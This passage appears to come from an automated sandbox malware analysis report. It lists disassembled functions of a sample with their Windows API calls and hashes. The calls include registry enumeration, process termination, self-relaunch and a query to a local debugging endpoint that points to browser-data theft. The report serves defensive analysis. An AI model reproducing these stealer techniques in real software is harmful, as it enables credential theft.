                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2367105040-0
                              • Opcode ID: d7aa46c2c51cd99efdd1bd88cffb7d0a9b40ceb740ac3af669ce08c78e017469
                              • Instruction ID: 53583cae0555eadc0498dd338794f828e76e695f7c096151c3711ded49be5fc7
                              • Opcode Fuzzy Hash: d7aa46c2c51cd99efdd1bd88cffb7d0a9b40ceb740ac3af669ce08c78e017469
                              • Instruction Fuzzy Hash: 78B19171914259DFDB20EFA4DC88EEE77B9AF48300F048569E906E7241DB389E45CBA0
                              Function 007BB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BB330
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB37E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB3A9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BB3B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB3D9
                              • lstrlen.KERNEL32(007E4C50), ref: 007BB450
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB474
                              • lstrcat.KERNEL32(00000000,007E4C50), ref: 007BB480
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB4A9
                              • lstrlen.KERNEL32(00000000), ref: 007BB52D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB557
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BB55F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB587
                              • lstrlen.KERNEL32(007E4AD4), ref: 007BB5FE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB622
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007BB62E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB65E
                              • lstrlen.KERNEL32(?), ref: 007BB767
                              • lstrlen.KERNEL32(?), ref: 007BB776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BB79E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: 9bcbf08dcf0a3610c9a9dae3b178e7e666c4989cb3fb6b4e73a841aaa973ac2c
                              • Instruction ID: cfc954be6ae00be5e605d87b14ccec4a1500b96695dc5f6fae425b6c5efa77df
                              • Opcode Fuzzy Hash: 9bcbf08dcf0a3610c9a9dae3b178e7e666c4989cb3fb6b4e73a841aaa973ac2c
                              • Instruction Fuzzy Hash: 37024F30A15205CFDB25DF65D989BAEB7F5BF44304F198069E8099B362DBB9DC42CB80
                              Function 007D3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • RegOpenKeyExA.ADVAPI32(?,0145AFA8,00000000,00020019,?), ref: 007D37BD
                              • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 007D37F7
                              • wsprintfA.USER32 ref: 007D3822
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 007D3840
                              • RegCloseKey.ADVAPI32(?), ref: 007D384E
                              • RegCloseKey.ADVAPI32(?), ref: 007D3858
                              • RegQueryValueExA.ADVAPI32(?,0145D9A8,00000000,000F003F,?,?), ref: 007D38A1
                              • lstrlen.KERNEL32(?), ref: 007D38B6
                              • RegQueryValueExA.ADVAPI32(?,0145DA20,00000000,000F003F,?,00000400), ref: 007D3927
                              • RegCloseKey.ADVAPI32(?), ref: 007D3972
                              • RegCloseKey.ADVAPI32(?), ref: 007D3989
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 13140697-3278919252
                              • Opcode ID: 52d57e23fb107cf210409099f49adb90372dec359f722a75c48d235e329deb9c
                              • Instruction ID: b3398d380ef925fef97b34670a5d2b865bfb715d6e5d97ea8250411fc1cf83c4
                              • Opcode Fuzzy Hash: 52d57e23fb107cf210409099f49adb90372dec359f722a75c48d235e329deb9c
                              • Instruction Fuzzy Hash: 89918D72904248DFCB10DFA4DD84AEEB7B9FB48314F14856AE509BB351D735AE42CBA0
                              Function 007B90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B90DF
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007B90FC
                              • InternetCloseHandle.WININET(00000000), ref: 007B9109
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 007B9166
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 007B9197
                              • InternetCloseHandle.WININET(00000000), ref: 007B91A2
                              • InternetCloseHandle.WININET(00000000), ref: 007B91A9
                              • strlen.MSVCRT ref: 007B91BA
                              • strlen.MSVCRT ref: 007B91ED
                              • strlen.MSVCRT ref: 007B922E
                              • strlen.MSVCRT ref: 007B924C
                                • Part of subcall function 007B8980: std::_Xinvalid_argument.LIBCPMT ref: 007B8996
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: b331514e2ac2e28dc93d4c381bf652b9121fe19f2cd51289fb262bd20fb97dba
                              • Instruction ID: 355cdfbad6ab90bb7f35cb73102fa8aaaac5348e3cfc2e2e656c291e11adbcaf
                              • Opcode Fuzzy Hash: b331514e2ac2e28dc93d4c381bf652b9121fe19f2cd51289fb262bd20fb97dba
                              • Instruction Fuzzy Hash: 4D51D7B1A00249ABDB10DBA9DC49FDEB7BDEB48710F140069F604E7280DBB8E944D7A5
                              Function 007D1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 007D16A1
                              • lstrcpy.KERNEL32(00000000,0144AEC8), ref: 007D16CC
                              • lstrlen.KERNEL32(?), ref: 007D16D9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D16F6
                              • lstrcat.KERNEL32(00000000,?), ref: 007D1704
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D172A
                              • lstrlen.KERNEL32(0145A0D0), ref: 007D173F
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1762
                              • lstrcat.KERNEL32(00000000,0145A0D0), ref: 007D176A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1792
                              • ShellExecuteEx.SHELL32(?), ref: 007D17CD
                              • ExitProcess.KERNEL32 ref: 007D1803
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: 3d1b5aa74f86c09e6e855ea7c0cb4a8402cdf5472d309fd99dd532153b008fc8
                              • Instruction ID: 3d10166f1b94c08374f3a3547ff5905e778951e96cde0bbbb751c0461c06f69a
                              • Opcode Fuzzy Hash: 3d1b5aa74f86c09e6e855ea7c0cb4a8402cdf5472d309fd99dd532153b008fc8
                              • Instruction Fuzzy Hash: 7151A370A15259EBDB11DFA4DDC8ADEB7F9AF44300F444126E909E7351DB34AE02DB90
                              Function 007CEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CEFE4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CF012
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007CF026
                              • lstrlen.KERNEL32(00000000), ref: 007CF035
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 007CF053
                              • StrStrA.SHLWAPI(00000000,?), ref: 007CF081
                              • lstrlen.KERNEL32(?), ref: 007CF094
                              • lstrlen.KERNEL32(00000000), ref: 007CF0B2
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 007CF0FF
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 007CF13F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: 08c00b9823c83c237995ccaf60e4182fc94beab8b6997bb24687139a45e095e2
                              • Instruction ID: 1e369a43be0949bc8071db56e19346749e10e4528698359f3445da2650939e40
                              • Opcode Fuzzy Hash: 08c00b9823c83c237995ccaf60e4182fc94beab8b6997bb24687139a45e095e2
                              • Instruction Fuzzy Hash: ED518E31915145DFCB21AF74DC89FAE77A6AF54710F09856DFC4AAB213DA38DC028B90
                              Function 007BA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(014589C8,009E9BD8,0000FFFF), ref: 007BA026
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BA053
                              • lstrlen.KERNEL32(009E9BD8), ref: 007BA060
                              • lstrcpy.KERNEL32(00000000,009E9BD8), ref: 007BA08A
                              • lstrlen.KERNEL32(007E4C4C), ref: 007BA095
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BA0B2
                              • lstrcat.KERNEL32(00000000,007E4C4C), ref: 007BA0BE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BA0E4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BA0EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BA114
                              • SetEnvironmentVariableA.KERNEL32(014589C8,00000000), ref: 007BA12F
                              • LoadLibraryA.KERNEL32(0145D2C0), ref: 007BA143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: 2fdf67deaa90868ac71e70037d322c5b46a6e789f662e9c92902a06ef1d9f311
                              • Instruction ID: c2da01ade34aafe01c4141d2ae5f7b117ad366eca5f0a7c70cc5e0e88acea66e
                              • Opcode Fuzzy Hash: 2fdf67deaa90868ac71e70037d322c5b46a6e789f662e9c92902a06ef1d9f311
                              • Instruction Fuzzy Hash: 6691B131A14644AFD731BFA8DC88BE737B6BB94704F404458E8099B262EF79DC41DB92
                              Function 007CC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CC8A2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CC8D1
                              • lstrlen.KERNEL32(00000000), ref: 007CC8FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007CC932
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007CC943
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: dcc11f79e9d1bce15a5bc9766ee88a8627b46aef5ca7bb3d828b1915efc21865
                              • Instruction ID: 038fa88c8b16ceab41b2afdca3fad1dd9d8e9dec986e2406f16746618f2c69e6
                              • Opcode Fuzzy Hash: dcc11f79e9d1bce15a5bc9766ee88a8627b46aef5ca7bb3d828b1915efc21865
                              • Instruction Fuzzy Hash: F2619271D152199BDB12DFB58889FEE7BF8AF05300F04816DE849E7242D73C9D028BA0
                              Function 007D4500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 007D451A
                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,007C4F39), ref: 007D4545
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D454C
                              • wsprintfW.USER32 ref: 007D455B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007D45CA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007D45D9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 007D45E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID: 9O|$%hs$9O|
                              • API String ID: 3729781310-725078639
                              • Opcode ID: 0cc43e1ff6869071e8d621a152d5b1de95e1486d7e3643047a8f04a156b0d408
                              • Instruction ID: dd015c153a431638cdd7ae57e1cc3be9f8bbab6520073ad43e9e879d2ebcc8a2
                              • Opcode Fuzzy Hash: 0cc43e1ff6869071e8d621a152d5b1de95e1486d7e3643047a8f04a156b0d408
                              • Instruction Fuzzy Hash: D1317371A14245BBDB20DBE4DC89FDE7778FF44701F104455FA06EB280EB746A418BA5
